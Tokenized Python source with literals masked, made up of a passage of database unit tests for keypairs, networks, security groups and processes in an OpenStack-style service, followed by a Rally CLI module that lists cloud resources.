"<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT>" + self . network_id , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> db . network_create ( self . ctxt , create_values ) <EOL> deleted_network = db . network_delete ( <EOL> self . ctxt , self . gid , self . network_id ) <EOL> self . assertEqual ( deleted_network [ "<STR_LIT>" ] , <NUM_LIT:1> ) <EOL> network_list = db . network_get_all ( self . ctxt , self . gid ) <EOL> self . assertEqual ( network_list , [ ] ) <EOL> PRIVATE_KEY = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class KeypairTestCase ( test . TestCase , ModelsObjectComparatorMixin ) : <EOL> def setUp ( self ) : <EOL> super ( KeypairTestCase , self ) . setUp ( ) <EOL> self . ctxt = context . get_admin_context ( ) <EOL> self . user_ctxt = context . RequestContext ( '<STR_LIT:user>' , '<STR_LIT:user>' ) <EOL> def _get_base_values ( self , gid ) : <EOL> return { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : gid , <EOL> "<STR_LIT>" : self . user_ctxt . user_id , <EOL> "<STR_LIT>" : self . user_ctxt . project_id , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : PRIVATE_KEY , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True <EOL> } <EOL> def _create_group ( self , gid ) : <EOL> values = { <EOL> "<STR_LIT>" : gid , <EOL> "<STR_LIT>" : self . user_ctxt . user_id , <EOL> "<STR_LIT>" : self . user_ctxt . project_id , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False <EOL> } <EOL> return db . group_create ( self . user_ctxt , values ) <EOL> def _create_keypair ( self , gid , values ) : <EOL> v = self . _get_base_values ( gid ) <EOL> v . update ( values ) <EOL> return db . keypair_create ( self . user_ctxt , v ) <EOL> def test_keypair_get_all ( self ) : <EOL> gid = "<STR_LIT>" <EOL> self . _create_group ( gid ) <EOL> values = [ <EOL> { "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : "<STR_LIT>" } , <EOL> ] <EOL> keypairs = [ self . _create_keypair ( gid , value ) for value in values ] <EOL> expected_keypairs = db . keypair_get_all ( self . user_ctxt , gid ) <EOL> self . _assertEqualListsOfObjects ( keypairs , expected_keypairs ) <EOL> def test_keypair_get_by_keypair_id ( self ) : <EOL> gid = "<STR_LIT>" <EOL> self . _create_group ( gid ) <EOL> values = [ <EOL> { "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : "<STR_LIT>" } , <EOL> ] <EOL> keypairs = [ self . _create_keypair ( gid , value ) for value in values ] <EOL> expected = db . keypair_get_by_keypair_id ( <EOL> self . user_ctxt , gid , values [ <NUM_LIT:0> ] [ "<STR_LIT>" ] ) <EOL> self . _assertEqualObjects ( keypairs [ <NUM_LIT:0> ] , expected ) <EOL> def test_keypair_get_keypair_not_found ( self ) : <EOL> gid = "<STR_LIT>" <EOL> self . _create_group ( gid ) <EOL> values = self . _get_base_values ( gid ) <EOL> db . keypair_create ( self . user_ctxt , values ) <EOL> self . assertRaises ( exception . KeypairNotFound , <EOL> db . keypair_get_by_keypair_id , <EOL> self . user_ctxt , gid , "<STR_LIT>" ) <EOL> def test_keypair_create ( self ) : <EOL> gid = "<STR_LIT>" <EOL> self . _create_group ( gid ) <EOL> values = self . _get_base_values ( gid ) <EOL> keypair = db . keypair_create ( self . user_ctxt , values ) <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> self . _assertEqualObjects ( keypair , values , ignored_keys ) <EOL> def test_keypair_update ( self ) : <EOL> gid = "<STR_LIT>" <EOL> self . _create_group ( gid ) <EOL> values_before = self . _get_base_values ( gid ) <EOL> keypair = db . keypair_create ( self . user_ctxt , values_before ) <EOL> values = { <EOL> "<STR_LIT>" : False <EOL> } <EOL> keypair_after = db . keypair_update ( <EOL> self . user_ctxt , gid , keypair [ "<STR_LIT>" ] , values ) <EOL> self . assertEqual ( keypair_after [ "<STR_LIT>" ] , False ) <EOL> def test_keypair_update_keypair_not_found ( self ) : <EOL> gid = "<STR_LIT>" <EOL> keypair_id = "<STR_LIT>" <EOL> self . assertRaises ( exception . KeypairNotFound , <EOL> db . keypair_update , <EOL> context = self . user_ctxt , <EOL> gid = gid , <EOL> keypair_id = keypair_id , <EOL> values = { } ) <EOL> def test_keypair_delete ( self ) : <EOL> gid = "<STR_LIT>" <EOL> self . _create_group ( gid ) <EOL> values_before = self . _get_base_values ( gid ) <EOL> keypair = db . keypair_create ( self . user_ctxt , values_before ) <EOL> keypair_after = db . keypair_delete ( <EOL> self . user_ctxt , gid , keypair [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , keypair_after [ "<STR_LIT>" ] ) <EOL> self . assertIsNotNone ( keypair_after . get ( "<STR_LIT>" ) ) <EOL> def test_keypair_delete_not_found ( self ) : <EOL> gid = "<STR_LIT>" <EOL> keypair_id = "<STR_LIT>" <EOL> self . assertRaises ( exception . KeypairNotFound , <EOL> db . keypair_delete , <EOL> context = self . user_ctxt , <EOL> gid = gid , keypair_id = keypair_id ) <EOL> class SecuritygroupTestCase ( test . TestCase , ModelsObjectComparatorMixin ) : <EOL> def setUp ( self ) : <EOL> super ( SecuritygroupTestCase , self ) . setUp ( ) <EOL> self . ctxt = context . get_admin_context ( ) <EOL> self . user_ctxt = context . RequestContext ( '<STR_LIT:user>' , '<STR_LIT:user>' ) <EOL> def _get_base_values ( self , gid , securitygroup_id = None ) : <EOL> return { <EOL> "<STR_LIT>" : securitygroup_id or "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" : gid , <EOL> "<STR_LIT>" : self . user_ctxt . user_id , <EOL> "<STR_LIT>" : self . user_ctxt . project_id , <EOL> "<STR_LIT>" : securitygroup_id or "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> def _create_group ( self , gid ) : <EOL> values = { <EOL> "<STR_LIT>" : gid , <EOL> "<STR_LIT>" : self . user_ctxt . user_id , <EOL> "<STR_LIT>" : self . user_ctxt . project_id , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> return db . group_create ( self . user_ctxt , values ) <EOL> def test_securitygroup_get_all ( self ) : <EOL> group = self . _create_group ( "<STR_LIT>" ) <EOL> securitygroup_ids = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> securitygroups = [ ] <EOL> for securitygroup_id in securitygroup_ids : <EOL> securitygroup = db . securitygroup_create ( <EOL> self . user_ctxt , self . _get_base_values ( group [ "<STR_LIT>" ] , <EOL> securitygroup_id ) ) <EOL> securitygroups . append ( securitygroup ) <EOL> res_securitygroups = db . securitygroup_get_all ( context , group [ "<STR_LIT>" ] ) <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . assertEqual ( len ( res_securitygroups ) , len ( securitygroups ) ) <EOL> for i in range ( <NUM_LIT:0> , len ( res_securitygroups ) ) : <EOL> self . _assertEqualObjects ( <EOL> res_securitygroups [ i ] , securitygroups [ i ] , ignored_keys ) <EOL> def test_securitygroup_get_all_empty ( self ) : <EOL> res_securitygroups = db . securitygroup_get_all ( context , "<STR_LIT>" ) <EOL> expected = [ ] <EOL> self . assertEqual ( res_securitygroups , expected ) <EOL> def test_securitygroup_get_by_securitygroup_id ( self ) : <EOL> group = self . _create_group ( "<STR_LIT>" ) <EOL> securitygroup_ids = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> securitygroups = [ ] <EOL> for securitygroup_id in securitygroup_ids : <EOL> securitygroup = db . securitygroup_create ( <EOL> self . user_ctxt , self . _get_base_values ( group [ "<STR_LIT>" ] , <EOL> securitygroup_id ) ) <EOL> securitygroups . append ( securitygroup ) <EOL> res_securitygroup = db . securitygroup_get_by_securitygroup_id ( <EOL> self . user_ctxt , group [ "<STR_LIT>" ] , securitygroup_ids [ <NUM_LIT:0> ] ) <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . _assertEqualObjects ( <EOL> res_securitygroup , securitygroups [ <NUM_LIT:0> ] , ignored_keys ) <EOL> def test_securitygroup_get_by_securitygroup_id_not_found ( self ) : <EOL> try : <EOL> db . securitygroup_get_by_securitygroup_id ( <EOL> self . user_ctxt , "<STR_LIT>" , "<STR_LIT>" ) <EOL> except Exception as e : <EOL> status_code = e . code <EOL> self . assertEqual ( status_code , <NUM_LIT> ) <EOL> def test_securitygroup_create ( self ) : <EOL> gid = "<STR_LIT>" <EOL> self . _create_group ( gid ) <EOL> values = self . _get_base_values ( gid ) <EOL> securitygroup = db . securitygroup_create ( self . user_ctxt , values ) <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> self . _assertEqualObjects ( securitygroup , values , ignored_keys ) <EOL> def test_securitygroup_update ( self ) : <EOL> gid = "<STR_LIT>" <EOL> self . _create_group ( gid ) <EOL> values_before = self . _get_base_values ( gid ) <EOL> securitygroup = db . securitygroup_create ( self . user_ctxt , values_before ) <EOL> values = { <EOL> "<STR_LIT>" : False <EOL> } <EOL> securitygroup_after = db . securitygroup_update ( <EOL> self . user_ctxt , gid , securitygroup [ "<STR_LIT>" ] , values ) <EOL> self . assertEqual ( securitygroup_after [ "<STR_LIT>" ] , False ) <EOL> def test_securitygroup_update_securitygroup_not_found ( self ) : <EOL> gid = "<STR_LIT>" <EOL> securitygroup_id = "<STR_LIT>" <EOL> self . assertRaises ( exception . SecuritygroupNotFound , <EOL> db . securitygroup_update , <EOL> context = self . user_ctxt , <EOL> gid = gid , <EOL> securitygroup_id = securitygroup_id , <EOL> values = { } ) <EOL> def test_securitygroup_delete ( self ) : <EOL> gid = "<STR_LIT>" <EOL> self . _create_group ( gid ) <EOL> values_before = self . _get_base_values ( gid ) <EOL> securitygroup = db . securitygroup_create ( self . user_ctxt , values_before ) <EOL> securitygroup_after = db . securitygroup_delete ( <EOL> self . user_ctxt , gid , securitygroup [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , securitygroup_after [ "<STR_LIT>" ] ) <EOL> self . assertIsNotNone ( securitygroup_after . get ( "<STR_LIT>" ) ) <EOL> def test_securitygroup_delete_not_found ( self ) : <EOL> gid = "<STR_LIT>" <EOL> securitygroup_id = "<STR_LIT>" <EOL> self . assertRaises ( exception . SecuritygroupNotFound , <EOL> db . securitygroup_delete , <EOL> context = self . user_ctxt , <EOL> gid = gid , securitygroup_id = securitygroup_id ) <EOL> class ProcessTestCase ( test . TestCase , ModelsObjectComparatorMixin ) : <EOL> def setUp ( self ) : <EOL> super ( ProcessTestCase , self ) . setUp ( ) <EOL> self . ctxt = context . get_admin_context ( ) <EOL> self . user_ctxt = context . RequestContext ( '<STR_LIT:user>' , '<STR_LIT:user>' ) <EOL> self . gid = unicode ( uuid . uuid4 ( ) ) <EOL> self . group = self . _create_group ( self . gid ) <EOL> self . network = self . _create_network ( self . gid ) <EOL> self . keypair = self . _create_keypair ( self . gid ) <EOL> self . securitygroup = self . _create_securitygroup ( self . gid ) <EOL> def _get_base_values ( self ) : <EOL> return { <EOL> "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : self . keypair [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : self . gid , <EOL> "<STR_LIT>" : self . user_ctxt . user_id , <EOL> "<STR_LIT>" : self . user_ctxt . project_id , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:args>" : None , <EOL> "<STR_LIT>" : None <EOL> } <EOL> def _create_group ( self , gid ) : <EOL> values = { <EOL> "<STR_LIT>" : gid , <EOL> "<STR_LIT>" : self . user_ctxt . user_id , <EOL> "<STR_LIT>" : self . user_ctxt . project_id , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> return db . group_create ( self . user_ctxt , values ) <EOL> def _create_network ( self , gid ) : <EOL> values = { <EOL> "<STR_LIT>" : gid , <EOL> "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : self . user_ctxt . user_id , <EOL> "<STR_LIT>" : self . user_ctxt . project_id , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> return db . network_create ( self . user_ctxt , values ) <EOL> def _create_keypair ( self , gid ) : <EOL> values = { <EOL> "<STR_LIT>" : gid , <EOL> "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : "<STR_LIT:test>" , <EOL> "<STR_LIT>" : self . user_ctxt . user_id , <EOL> "<STR_LIT>" : self . user_ctxt . project_id , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> return db . keypair_create ( self . user_ctxt , values ) <EOL> def _create_securitygroup ( self , gid ) : <EOL> values = { <EOL> "<STR_LIT>" : gid , <EOL> "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : self . user_ctxt . user_id , <EOL> "<STR_LIT>" : self . user_ctxt . project_id , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> return db . securitygroup_create ( self . user_ctxt , values ) <EOL> def _create_process ( self , gid , create_count ) : <EOL> processes = [ ] <EOL> for i in range ( <NUM_LIT:0> , create_count ) : <EOL> process = db . process_create ( <EOL> self . user_ctxt , <EOL> self . _get_base_values ( ) , <EOL> [ self . network [ "<STR_LIT>" ] ] , <EOL> [ self . securitygroup [ "<STR_LIT>" ] ] ) <EOL> processes . append ( process ) <EOL> return processes <EOL> def _create_process_deleted ( self , gid , create_count ) : <EOL> processes = [ ] <EOL> process_base_value = self . _get_base_values ( ) <EOL> process_base_value [ "<STR_LIT>" ] = <NUM_LIT:1> <EOL> for i in range ( <NUM_LIT:0> , create_count ) : <EOL> process = db . process_create ( <EOL> self . user_ctxt , <EOL> process_base_value , <EOL> [ self . network [ "<STR_LIT>" ] ] , <EOL> [ self . securitygroup [ "<STR_LIT>" ] ] ) <EOL> processes . append ( process ) <EOL> return processes <EOL> def test_process_get_all ( self ) : <EOL> processes = self . _create_process ( self . gid , <NUM_LIT:3> ) <EOL> res_processes = db . process_get_all ( context , self . gid ) <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . assertEqual ( len ( res_processes ) , len ( processes ) ) <EOL> for i in range ( <NUM_LIT:0> , len ( res_processes ) ) : <EOL> self . _assertEqualObjects ( <EOL> res_processes [ i ] , processes [ i ] , ignored_keys ) <EOL> def test_process_get_all_empty ( self ) : <EOL> res_processes = db . process_get_all ( context , self . gid ) <EOL> expected = [ ] <EOL> self . assertEqual ( res_processes , expected ) <EOL> def test_process_get_by_pid ( self ) : <EOL> processes = self . _create_process ( self . gid , <NUM_LIT:3> ) <EOL> res_process = db . process_get_by_pid ( <EOL> self . user_ctxt , self . gid , processes [ <NUM_LIT:0> ] [ "<STR_LIT>" ] ) <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . _assertEqualObjects ( res_process , processes [ <NUM_LIT:0> ] , ignored_keys ) <EOL> def test_process_get_by_pid_get_deleted ( self ) : <EOL> processes = self . _create_process_deleted ( self . gid , <NUM_LIT:1> ) <EOL> res_process = db . process_get_by_pid ( <EOL> self . user_ctxt , self . gid , processes [ <NUM_LIT:0> ] [ "<STR_LIT>" ] ) <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . _assertEqualObjects ( res_process , processes [ <NUM_LIT:0> ] , ignored_keys ) <EOL> def test_process_get_by_pid_not_found ( self ) : <EOL> try : <EOL> db . process_get_by_pid ( self . user_ctxt , self . gid , "<STR_LIT>" ) <EOL> except Exception as e : <EOL> status_code = e . code <EOL> self . assertEqual ( status_code , <NUM_LIT> ) <EOL> def test_process_create ( self ) : <EOL> values = self . _get_base_values ( ) <EOL> process = db . process_create ( self . user_ctxt , <EOL> values , <EOL> [ self . network [ "<STR_LIT>" ] ] , <EOL> [ self . securitygroup [ "<STR_LIT>" ] ] ) <EOL> values [ "<STR_LIT>" ] = [ self . network ] <EOL> values [ "<STR_LIT>" ] = [ self . securitygroup ] <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> self . _assertEqualObjects ( process , values , ignored_keys ) <EOL> def test_process_create_duplicated_network_id ( self ) : <EOL> values = self . _get_base_values ( ) <EOL> try : <EOL> db . process_create ( self . user_ctxt , <EOL> values , <EOL> [ self . network [ "<STR_LIT>" ] , <EOL> self . network [ "<STR_LIT>" ] ] , <EOL> [ self . securitygroup [ "<STR_LIT>" ] ] ) <EOL> except exception . InvalidInput as e : <EOL> status_code = e . code <EOL> self . assertEqual ( status_code , <NUM_LIT> ) <EOL> def test_process_create_duplicated_securitygroup_id ( self ) : <EOL> values = self . _get_base_values ( ) <EOL> try : <EOL> db . process_create ( self . user_ctxt , <EOL> values , <EOL> [ self . network [ "<STR_LIT>" ] ] , <EOL> [ self . securitygroup [ "<STR_LIT>" ] , <EOL> self . securitygroup [ "<STR_LIT>" ] ] ) <EOL> except exception . InvalidInput as e : <EOL> status_code = e . code <EOL> self . assertEqual ( status_code , <NUM_LIT> ) <EOL> def test_process_update ( self ) : <EOL> values_before = self . _get_base_values ( ) <EOL> process = db . process_create ( self . user_ctxt , <EOL> values_before , <EOL> [ self . network [ "<STR_LIT>" ] ] , <EOL> [ self . securitygroup [ "<STR_LIT>" ] ] ) <EOL> values = { <EOL> "<STR_LIT>" : "<STR_LIT:test>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> process_after = db . process_update ( <EOL> self . user_ctxt , self . gid , process [ "<STR_LIT>" ] , values ) <EOL> self . assertEqual ( process_after [ "<STR_LIT>" ] , "<STR_LIT:test>" ) <EOL> self . assertEqual ( process_after [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> self . assertEqual ( process_after [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> self . assertEqual ( process_after [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def test_process_update_process_not_found ( self ) : <EOL> self . assertRaises ( exception . ProcessNotFound , <EOL> db . process_update , <EOL> context = self . user_ctxt , <EOL> gid = self . gid , <EOL> pid = unicode ( uuid . uuid4 ( ) ) , <EOL> values = { } ) <EOL> def test_process_delete ( self ) : <EOL> values_before = self . _get_base_values ( ) <EOL> process = db . process_create ( self . user_ctxt , <EOL> values_before , <EOL> [ self . network [ "<STR_LIT>" ] ] , <EOL> [ self . securitygroup [ "<STR_LIT>" ] ] ) <EOL> process_after = db . process_delete ( <EOL> self . user_ctxt , self . gid , process [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , process_after [ "<STR_LIT>" ] ) <EOL> self . assertIsNotNone ( process_after . get ( "<STR_LIT>" ) ) <EOL> def test_process_delete_not_found ( self ) : <EOL> self . assertRaises ( exception . ProcessNotFound , <EOL> db . process_delete , <EOL> context = self . user_ctxt , <EOL> gid = self . gid , pid = unicode ( uuid . uuid4 ( ) ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from rally import api <EOL> from rally . cli import cliutils <EOL> from rally . cli import envutils <EOL> from rally . common . i18n import _ <EOL> from rally . common import objects <EOL> from rally . common import utils <EOL> from rally import osclients <EOL> class ShowCommands ( object ) : <EOL> """<STR_LIT>""" <EOL> def _print_header ( self , resource_name , credentials ) : <EOL> print ( _ ( "<STR_LIT>" ) <EOL> % { "<STR_LIT>" : resource_name , <EOL> "<STR_LIT:user>" : credentials [ "<STR_LIT:username>" ] , <EOL> "<STR_LIT>" : credentials [ "<STR_LIT>" ] } ) <EOL> @ staticmethod <EOL> def _get_credentials ( deployment ) : <EOL> deployment = api . Deployment . get ( deployment ) <EOL> admin = deployment . deployment . get ( "<STR_LIT>" ) <EOL> credentials = [ admin ] if admin else [ ] <EOL> return credentials + deployment . deployment . get ( "<STR_LIT>" , [ ] ) <EOL> @ cliutils . args ( "<STR_LIT>" , dest = "<STR_LIT>" , type = str , <EOL> metavar = "<STR_LIT>" , required = False , <EOL> help = "<STR_LIT>" ) <EOL> @ envutils . with_default_deployment ( cli_arg_name = "<STR_LIT>" ) <EOL> @ cliutils . process_keystone_exc <EOL> def images ( self , deployment = None ) : <EOL> """<STR_LIT>""" <EOL> headers = [ "<STR_LIT>" , "<STR_LIT:Name>" , "<STR_LIT>" ] <EOL> mixed_case_fields = [ "<STR_LIT>" , "<STR_LIT:Name>" ] <EOL> float_cols = [ "<STR_LIT>" ] <EOL> formatters = dict ( zip ( float_cols , <EOL> [ cliutils . pretty_float_formatter ( col ) <EOL> for col in float_cols ] ) ) <EOL> for credential_dict in self . _get_credentials ( deployment ) : <EOL> self . _print_header ( "<STR_LIT>" , credential_dict ) <EOL> table_rows = [ ] <EOL> clients = osclients . Clients ( objects . Credential ( ** credential_dict ) ) <EOL> glance_client = clients . glance ( ) <EOL> for image in glance_client . images . list ( ) : <EOL> data = [ image . id , image . name , image . size ] <EOL> table_rows . append ( utils . Struct ( ** dict ( zip ( headers , data ) ) ) ) <EOL> cliutils . print_list ( table_rows , <EOL> fields = headers , <EOL> formatters = formatters , <EOL> mixed_case_fields = mixed_case_fields ) <EOL> @ cliutils . args ( "<STR_LIT>" , dest = "<STR_LIT>" , type = str , <EOL> metavar = "<STR_LIT>" , required = False , <EOL> help = "<STR_LIT>" ) <EOL> @ envutils . with_default_deployment ( cli_arg_name = "<STR_LIT>" ) <EOL> @ cliutils . process_keystone_exc <EOL> def flavors ( self , deployment = None ) : <EOL> """<STR_LIT>""" <EOL> headers = [ "<STR_LIT>" , "<STR_LIT:Name>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> mixed_case_fields = [ "<STR_LIT>" , "<STR_LIT:Name>" , "<STR_LIT>" ] <EOL> float_cols = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> formatters = dict ( zip ( float_cols , <EOL> [ cliutils . pretty_float_formatter ( col ) <EOL> for col in float_cols ] ) ) <EOL> for credential_dict in self . _get_credentials ( deployment ) : <EOL> self . _print_header ( "<STR_LIT>" , credential_dict ) <EOL> table_rows = [ ] <EOL> clients = osclients . Clients ( objects . Credential ( ** credential_dict ) ) <EOL> nova_client = clients . nova ( ) <EOL> for flavor in nova_client . flavors . list ( ) : <EOL> data = [ flavor . id , flavor . name , flavor . vcpus , <EOL> flavor . ram , flavor . swap , flavor . disk ] <EOL> table_rows . append ( utils . Struct ( ** dict ( zip ( headers , data ) ) ) ) <EOL> cliutils . print_list ( table_rows , <EOL> fields = headers , <EOL> formatters = formatters , <EOL> mixed_case_fields = mixed_case_fields ) <EOL> @ cliutils . args ( "<STR_LIT>" , dest = "<STR_LIT>" , type = str , <EOL> metavar = "<STR_LIT>" , required = False , <EOL> help = "<STR_LIT>" ) <EOL> @ envutils . with_default_deployment ( cli_arg_name = "<STR_LIT>" ) <EOL> @ cliutils . process_keystone_exc <EOL> def networks ( self , deployment = None ) : <EOL> """<STR_LIT>""" <EOL> headers = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> mixed_case_fields = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> for credential_dict in self . _get_credentials ( deployment ) : <EOL> self . _print_header ( "<STR_LIT>" , credential_dict ) <EOL> table_rows = [ ] <EOL> clients = osclients . Clients ( objects . Credential ( ** credential_dict ) ) <EOL> nova_client = clients . nova ( ) <EOL> for network in nova_client . networks . list ( ) : <EOL> data = [ network . id , network . label , network . cidr ] <EOL> table_rows . append ( utils . Struct ( ** dict ( zip ( headers , data ) ) ) ) <EOL> cliutils . print_list ( table_rows , <EOL> fields = headers , <EOL> mixed_case_fields = mixed_case_fields ) <EOL> @ cliutils . args ( "<STR_LIT>" , dest = "<STR_LIT>" , type = str , <EOL> metavar = "<STR_LIT>" , required = False , <EOL> help = "<STR_LIT>" ) <EOL> @ envutils . with_default_deployment ( cli_arg_name = "<STR_LIT>" ) <EOL> @ cliutils . process_keystone_exc <EOL> def secgroups ( self , deployment = None ) : <EOL> """<STR_LIT>""" <EOL> headers = [ "<STR_LIT>" , "<STR_LIT:Name>" , "<STR_LIT>" ] <EOL> mixed_case_fields = [ "<STR_LIT>" , "<STR_LIT:Name>" , "<STR_LIT>" ] <EOL> for credential_dict in self . _get_credentials ( deployment ) : <EOL> self . _print_header ( "<STR_LIT>" , credential_dict ) <EOL> table_rows = [ ] <EOL> clients = osclients . Clients ( objects . Credential ( ** credential_dict ) ) <EOL> nova_client = clients . nova ( ) <EOL> for secgroup in nova_client . security_groups . list ( ) : <EOL> data = [ secgroup . id , secgroup . name , <EOL> secgroup . description ] <EOL> table_rows . append ( utils . Struct ( ** dict ( zip ( headers , <EOL> data ) ) ) ) <EOL> cliutils . print_list ( <EOL> table_rows , <EOL> fields = headers , <EOL> mixed_case_fields = mixed_case_fields ) <EOL> @ cliutils . args ( "<STR_LIT>" , dest = "<STR_LIT>" , type = str , <EOL> metavar = "<STR_LIT>" , required = False , <EOL> help = "<STR_LIT>" ) <EOL> @ envutils . with_default_deployment ( cli_arg_name = "<STR_LIT>" ) <EOL> @ cliutils . process_keystone_exc <EOL> def keypairs ( self , deployment = None ) : <EOL> """<STR_LIT>""" <EOL> headers = [ "<STR_LIT:Name>" , "<STR_LIT>" ] <EOL> mixed_case_fields = [ "<STR_LIT:Name>" , "<STR_LIT>" ] <EOL> for credential_dict in self . _get_credentials ( deployment ) : <EOL> self . _print_header ( "<STR_LIT>" , credential_dict ) <EOL> table_rows = [ ] <EOL> clients = osclients . Clients ( objects . Credential ( ** credential_dict ) ) <EOL> nova_client = clients . nova ( ) <EOL> for keypair in nova_client . keypairs . list ( ) : <EOL> data = [ keypair . name , keypair . fingerprint ] <EOL> table_rows . append ( utils . Struct ( ** dict ( zip ( headers , data ) ) ) ) <EOL> cliutils . print_list ( table_rows , <EOL> fields = headers , <EOL> mixed_case_fields = mixed_case_fields ) </s>
